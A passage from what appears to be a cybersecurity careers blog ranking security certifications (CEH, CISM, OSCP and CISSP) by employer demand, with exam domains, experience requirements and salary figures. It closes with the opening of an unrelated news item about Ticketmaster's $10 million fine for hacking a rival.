The CEH online training course covers 18 security domains, comprehensively covering over 270 attack methods and technologies, while the certification requires passing a four-hour 125 exams questions the course domains, technologies, and hacking techniques.  Achieving CEH certification will open the door to financially lucrative and in high demand penetration tester roles, so little surprise that 21% of respondents stated their intent take CEH course within the next 12-24 months.

The EC-Council also provides following well-valued courses and certifications which didn't quite make it into this top ten.
3. Certified Information Security Manager (CISM) by ISACA
As its title suggests, the Certified Information Security Manager (CISM) by ISACA is suited for security management roles and is one of the most respected certifications within the security industry.  The CISM is not suited for beginners, a minimum of five years dedicated in role cybersecurity \ information security experience is required to take the course. 

The CISM course is designed for security managers, so has a strong focus on governance, strategy, and policies, which are split across four subject matter domains:
  1. Information Security Governance (24%)
  2. Information Risk Management (30%)
  3. Information Security Program Development and Management (27%)
  4. Information Security Incident Management (19%)
According to a 2020 salary study by Forbes, CISM was 3rd place overall with an impressive annual salary of £110,000 ($148,622 USD), which was the highest dedicated security certification listed by the study.

2. PWK OSCP by Offensive Security

As an online ethical hacking course, it is self-paced and introduces penetration testing tools and techniques through hands-on experiences. PEN-200 trains not only the skills but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the Offensive Security Certified Professional (OSCP) certification.

The course was ranked highly in the survey results.  Cybersecurity professionals said the course provided strong relevance to the ‘real world’, ranking the OSCP qualification in second place in terms of how much it was ‘in-demand’ by employers.

1. Certified Information Security Professional (CISSP) by ISC2
The ISC2 Certified Information Systems Security Professional (CISSP) remains the security certification in the greatest demand within the security industry. A whopping 72% of those surveyed said the CISSP certification was in the most in-demand by employers.

CISSP is a longstanding and globally well-respected information security professional certification. Like the CISM, the CISSP is not aimed at beginners. The certification requires 5 years of information security in role experience, or 4 years if you hold a cyber / information security-related degree. 

The CISSP three-hour exam of 100 to 150 questions has proven notoriously difficult to pass for some because the CISSP course covers a very broad spectrum of information security disciplines, which are split across eight domains.  

The CISSP 8 domains are:
  1. Security and Risk Management (15%)
  2. Asset Security (10%)
  3. Security Architecture and Engineering (13%)
  4. Communication and Network Security (13%)
  5. Identity and Access Management (IAM) (13%)
  6. Security Assessment and Testing (12%)
  7. Security Operations (13%)
  8. Software Development Security (11%)
ISC2 also offer several CISSP 'concentrations' courses and exams for those holding the CISSP accreditation, which demonstrates an advanced knowledge in specific areas of security. While CISSP concentrations tend not to be specifically sorted by employers in job ads, CISSP concentrations can help you to stand out from the crowd as a specific security subject matter expert.

For those nearer the start of their cybersecurity career journey, ISC2 offer the Associate of ISC2, as a gateway towards achieving the CISSP.

Let us know your top ten in the comments.

Survey data for this post is kindly provided by the Information Security Careers Network (ISCN).

Ticketmaster To Pay $10 Million Fine For Hacking A Rival Company

Ticketmaster has agreed to pay a $10 million fine after being charged with illegally accessing computer systems of a competitor repeatedly between 2013 and 2015 in an attempt to "cut [the company] off at the knees." A subsidiary of Live Nation, the California-based ticket sales and distribution company used the stolen information to gain an advantage over CrowdSurge — which merged with Songkick